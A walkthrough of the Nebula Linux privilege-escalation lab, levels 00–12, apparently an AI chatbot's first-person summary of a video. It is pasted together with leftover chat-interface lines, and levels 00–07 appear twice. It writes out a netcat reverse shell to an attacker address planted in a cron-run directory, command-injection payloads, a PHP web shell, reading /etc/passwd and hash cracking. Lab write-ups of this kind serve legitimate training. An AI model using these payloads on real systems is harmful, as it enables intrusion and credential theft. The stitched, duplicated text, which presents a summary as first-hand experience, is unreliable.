Nebula Level 08 Description
World readable files strike again. Check what that user was up to, and use it to log into flag08 account. To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.
Nebula Exploit Exercises: Linux Privilege Escalation
I went through the Nebula exploit exercises, which are designed for beginners looking to learn Linux privilege escalation. I tackled levels 00 through 12, demonstrating various techniques to gain higher privileges on the system.
For my setup, I explained how to download the Nebula ISO and import it into VMware Workstation. I used two terminal tabs: one for SSHing into the Nebula VM and another as a local listener for potential reverse shells.
Level 00: Finding a SetUID Program
My first task was to find a Set User ID (SUID) program that runs as the flag00
account. I used the following command to find SUID programs across the entire filesystem, redirecting errors to /dev/null
:
find / -perm -u=s -type f 2>/dev/null
Once I identified the target binary owned by flag00
, I simply executed it directly to solve the challenge. I confirmed success with the getflag
command, which I used throughout the levels.
Level 01: Exploiting Environment Variables (Path Manipulation)
In this level, I exploited a program that had a vulnerability allowing arbitrary program execution due to how it called the echo
command. The program called echo
without specifying its full path, relying on the system’s PATH
environment variable.
My exploitation steps were:
- I created a custom version of
echo
that was a symbolic link togetflag
using:ln -s /bin/getflag echo
. - I navigated to a directory I controlled, like
/tmp
. - I then prepended this directory to the
PATH
environment variable:export PATH=/tmp:$PATH
. This ensured my customecho
would be found first. - Finally, I executed the vulnerable
flag01
binary. This ran my customecho
(which wasgetflag
) with the privileges offlag01
.
Level 02: Exploiting Environment Variables (Command Injection via getenv
)
Here, I exploited a program that used getenv
to fetch an environment variable’s value and then used that value in a system()
call. The vulnerability was that the program retrieved the value of the USER
environment variable and incorporated it into a command executed by system()
.
To exploit this, I modified the USER
environment variable to include a command, using a semicolon for command chaining:
export USER=';/bin/getflag;'
The semicolons effectively terminated the existing command structure in the C code, allowing getflag
to be executed as a new command. Then, I simply ran the flag02
binary.
Level 03: Exploiting a Writable Cron Job Script
This level involved leveraging a cron job that executed scripts from a world-writable directory. The vulnerability was a script (writable.sh
) that ran periodically via cron and executed any files found in a specific directory (writable.d
).
My exploitation steps were:
- I created a script in the
writable.d
directory to establish a reverse shell. I used a netcat one-liner:echo 'nc -e /bin/bash <attacker_IP> <attacker_port>' > /home/flag03/writable.d/shell.sh
- I made the script executable:
chmod +x /home/flag03/writable.d/shell.sh
. - Then, I waited for the cron job to execute the script, which connected back to my listener as
flag03
. Once the shell was received, I rangetflag
.
Level 04: Bypassing File Access Restrictions with Symbolic Links
My goal here was to read a restricted token
file. The flag04
program had a check that prevented directly accessing a file named “token.”
To bypass this, I created a symbolic link in /tmp
that pointed to the actual token file but with a different name:
ln -s /home/flag04/token /tmp/level04
Then, I ran the flag04
program, providing the symbolic link as the argument:
/home/flag04/flag04 /tmp/level04
This successfully bypassed the name check, and the program read the token file’s content. I then used the retrieved token as the password for the flag04
user.
Level 05: Exploiting Weak Directory Permissions (SSH Private Key)
This level focused on exploiting weak directory permissions to find an SSH private key. The vulnerability was a backup directory (.backup
) containing a compressed file with an SSH private key. While direct extraction might be restricted, the file could be copied.
My exploitation steps were:
- I copied the compressed backup file to
/tmp
:cp /home/flag05/.backup/backup.tar.gz /tmp/
. - I then extracted the archive in
/tmp
:tar -zxvf backup.tar.gz
. - This revealed an
id_rsa
(private key) file. - I then used this private key to SSH into the
flag05
account:ssh -i /path/to/id_rsa flag05@localhost
. (I noted an issue with my VM preventing successful login via this method, but it should generally work).
Level 06: Cracking Password Hashes from /etc/passwd
Here, my goal was to crack a user’s password hash found in /etc/passwd
on a legacy system. The vulnerability was that legacy Unix systems might store password hashes directly in /etc/passwd
.
My exploitation steps were:
- I viewed the
/etc/passwd
file:cat /etc/passwd
. - I identified and copied the line containing the hash for
flag06
. - I then used John the Ripper on my attacker machine to crack the hash:
john --show name_of_file_with_hash
. - Finally, I used the cracked password (“hello”) to switch to the
flag06
user.
Level 07: Command Injection in a Perl CGI Script
This level involved exploiting command injection in a Perl CGI script that pinged hosts. The vulnerability was that the script took a host as input and used it directly in a ping
command without proper sanitization.
My exploitation steps were:
- I initially tested command chaining locally:
./index.cgi host=<attacker_IP>;ls
. - Since the web server running the CGI script ran as
flag07
, I usedwget
to make the web server execute the script with my payload. I had to URL encode the semicolon (%3B
):wget "http://localhost:7070/index.cgi?host=127.0.0.1%3Bgetflag" -O /tmp/output
- The output containing the
getflag
result was saved to/tmp/output
, which I then viewed withcat /tmp/output
. I also mentioned that I sometimes had to restart the Nebula machine because the web server would die.
- Query successful
Try again without apps
I’ve summarized the video on the Nebula exploit exercises, focusing on Linux privilege escalation techniques. I’ve used a conversational tone with “I” and extracted the technical commands for each level.
Nebula Exploit Exercises: Linux Privilege Escalation
I went through the Nebula exploit exercises, which are designed for beginners looking to learn Linux privilege escalation. I tackled levels 00 through 12, demonstrating various techniques to gain higher privileges on the system.
For my setup, I explained how to download the Nebula ISO and import it into VMware Workstation. I used two terminal tabs: one for SSHing into the Nebula VM and another as a local listener for potential reverse shells.
Level 00: Finding a SetUID Program
My first task was to find a Set User ID (SUID) program that runs as the flag00
account. I used the following command to find SUID programs across the entire filesystem, redirecting errors to /dev/null
:
find / -perm -u=s -type f 2>/dev/null
Once I identified the target binary owned by flag00
, I simply executed it directly to solve the challenge. I confirmed success with the getflag
command, which I used throughout the levels.
Level 01: Exploiting Environment Variables (Path Manipulation)
In this level, I exploited a program that had a vulnerability allowing arbitrary program execution due to how it called the echo
command. The program called echo
without specifying its full path, relying on the system’s PATH
environment variable.
My exploitation steps were:
- I created a custom version of
echo
that was a symbolic link togetflag
using:ln -s /bin/getflag echo
. - I navigated to a directory I controlled, like
/tmp
. - I then prepended this directory to the
PATH
environment variable:export PATH=/tmp:$PATH
. This ensured my customecho
would be found first. - Finally, I executed the vulnerable
flag01
binary. This ran my customecho
(which wasgetflag
) with the privileges offlag01
.
Level 02: Exploiting Environment Variables (Command Injection via getenv
)
Here, I exploited a program that used getenv
to fetch an environment variable’s value and then used that value in a system()
call. The vulnerability was that the program retrieved the value of the USER
environment variable and incorporated it into a command executed by system()
.
To exploit this, I modified the USER
environment variable to include a command, using a semicolon for command chaining:
export USER=';/bin/getflag;'
The semicolons effectively terminated the existing command structure in the C code, allowing getflag
to be executed as a new command. Then, I simply ran the flag02
binary.
Level 03: Exploiting a Writable Cron Job Script
This level involved leveraging a cron job that executed scripts from a world-writable directory. The vulnerability was a script (writable.sh
) that ran periodically via cron and executed any files found in a specific directory (writable.d
).
My exploitation steps were:
- I created a script in the
writable.d
directory to establish a reverse shell. I used a netcat one-liner:echo 'nc -e /bin/bash <attacker_IP> <attacker_port>' > /home/flag03/writable.d/shell.sh
- I made the script executable:
chmod +x /home/flag03/writable.d/shell.sh
. - Then, I waited for the cron job to execute the script, which connected back to my listener as
flag03
. Once the shell was received, I rangetflag
.
Level 04: Bypassing File Access Restrictions with Symbolic Links
My goal here was to read a restricted token
file. The flag04
program had a check that prevented directly accessing a file named “token.”
To bypass this, I created a symbolic link in /tmp
that pointed to the actual token file but with a different name:
ln -s /home/flag04/token /tmp/level04
Then, I ran the flag04
program, providing the symbolic link as the argument:
/home/flag04/flag04 /tmp/level04
This successfully bypassed the name check, and the program read the token file’s content. I then used the retrieved token as the password for the flag04
user.
Level 05: Exploiting Weak Directory Permissions (SSH Private Key)
This level focused on exploiting weak directory permissions to find an SSH private key. The vulnerability was a backup directory (.backup
) containing a compressed file with an SSH private key. While direct extraction might be restricted, the file could be copied.
My exploitation steps were:
- I copied the compressed backup file to
/tmp
:cp /home/flag05/.backup/backup.tar.gz /tmp/
. - I then extracted the archive in
/tmp
:tar -zxvf backup.tar.gz
. - This revealed an
id_rsa
(private key) file. - I then used this private key to SSH into the
flag05
account:ssh -i /path/to/id_rsa flag05@localhost
. (I noted an issue with my VM preventing successful login via this method, but it should generally work).
Level 06: Cracking Password Hashes from /etc/passwd
Here, my goal was to crack a user’s password hash found in /etc/passwd
on a legacy system. The vulnerability was that legacy Unix systems might store password hashes directly in /etc/passwd
.
My exploitation steps were:
- I viewed the
/etc/passwd
file:cat /etc/passwd
. - I identified and copied the line containing the hash for
flag06
. - I then used John the Ripper on my attacker machine to crack the hash:
john --show name_of_file_with_hash
. - Finally, I used the cracked password (“hello”) to switch to the
flag06
user.
Level 07: Command Injection in a Perl CGI Script
This level involved exploiting command injection in a Perl CGI script that pinged hosts. The vulnerability was that the script took a host as input and used it directly in a ping
command without proper sanitization.
My exploitation steps were:
- I initially tested command chaining locally:
./index.cgi host=<attacker_IP>;ls
. - Since the web server running the CGI script ran as
flag07
, I usedwget
to make the web server execute the script with my payload. I had to URL encode the semicolon (%3B
):wget "http://localhost:7070/index.cgi?host=127.0.0.1%3Bgetflag" -O /tmp/output
- The output containing the
getflag
result was saved to/tmp/output
, which I then viewed withcat /tmp/output
. I also mentioned that I sometimes had to restart the Nebula machine because the web server would die.
Level 08: Analyzing Network Capture (Pcap) for Credentials
My goal here was to extract credentials from a provided .pcap
file.
My method involved:
- Transferring the
.pcap
file from the Nebula machine to my attacker machine (e.g., using a simple Python HTTP server on Nebula andwget
or a browser on the attacker machine). On Nebula, I used:python -m SimpleHTTPServer
. - Opening the
.pcap
file in Wireshark. - Following the TCP stream of the relevant packets.
- Initially, the password appeared to be “backdoor…”, but by looking at the hex dump, I saw backspace characters (
7F
). By interpreting the backspaces, the actual password was deduced to be “backd0rm@”. - I then used this password to switch to the
flag08
user.
Level 09: PHP Command Execution via preg_replace
with /e
Modifier
In this level, I exploited a vulnerable PHP script executed by a SUID wrapper. The vulnerability was that the PHP script used preg_replace
with the /e
(evaluate) modifier, allowing PHP code execution if the input could be controlled. The file_get_contents
function also took user-supplied input for the filename.
My exploitation steps were:
- I created a custom PHP file (e.g., in
/tmp/level09.solution
) with the content:<?php system($_GET['use_me']); ?>
. - I then ran the SUID wrapper (
flag09
), providing my custom PHP file as the first argument and the command to execute (getflag
) as the second argument:/home/flag09/flag09 /tmp/level09.solution getflag
Level 10 & 11: Skipped
I skipped Level 10 due to its “noisy” nature and the need for endless loops of bash scripts. I also skipped Level 11, mentioning a problem in the code.
Level 12: Command Injection in a Lua Script
My final challenge was to exploit command injection in a Lua script listening on a network port. The vulnerability was that a Lua script listened on port 50001. It took a password, hashed it, and compared it. Crucially, it used io.popen
(similar to os.execute
or system()
) with the user-supplied password, leading to command injection.
My exploitation steps were:
- I connected to the listening port using
netcat
:nc 127.0.0.1 50001
. - When prompted for a password, I provided a payload that injected a command. I used backticks (
`
) for command substitution to executegetflag
and redirect its output to a file in/tmp
:`getflag > /home/flag12/test2`
- The script executed this, and then I viewed the contents of the output file:
cat /home/flag12/test2
.
This concludes my detailed summary of the techniques and commands demonstrated in the video!